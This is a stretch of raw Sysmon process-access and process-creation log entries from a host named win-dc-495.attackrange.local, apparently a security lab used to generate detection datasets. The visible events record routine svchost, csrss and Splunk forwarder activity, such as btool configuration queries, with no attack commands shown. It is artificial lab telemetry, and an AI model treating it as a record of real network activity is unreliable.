13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.529{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE2-6005-AB00-00000000A301}3900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.529{59A5CD1D-8EDF-6005-9E00-00000000A301}47284532C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{59A5CD1D-8EE2-6005-AB00-00000000A301}3900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1893f|C:\Program 
Files\SplunkUniversalForwarder\bin\Splunk.EXE+17106|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1385a|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+12176|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+19082|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d94e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.535{59A5CD1D-8EE2-6005-AB00-00000000A301}3900C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EDF-6005-9E00-00000000A301}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2532 10341000x80000000000000003500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE2-6005-AA00-00000000A301}4100C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE2-6005-AA00-00000000A301}4100C:\Program 
Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8EE2-6005-A900-00000000A301}16525100C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE2-6005-AA00-00000000A301}4100C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program 
Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.274{59A5CD1D-8EE2-6005-AA00-00000000A301}4100C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE2-6005-A900-00000000A301}1652C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list httpServer --no-log 10341000x80000000000000003487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE2-6005-A900-00000000A301}1652C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 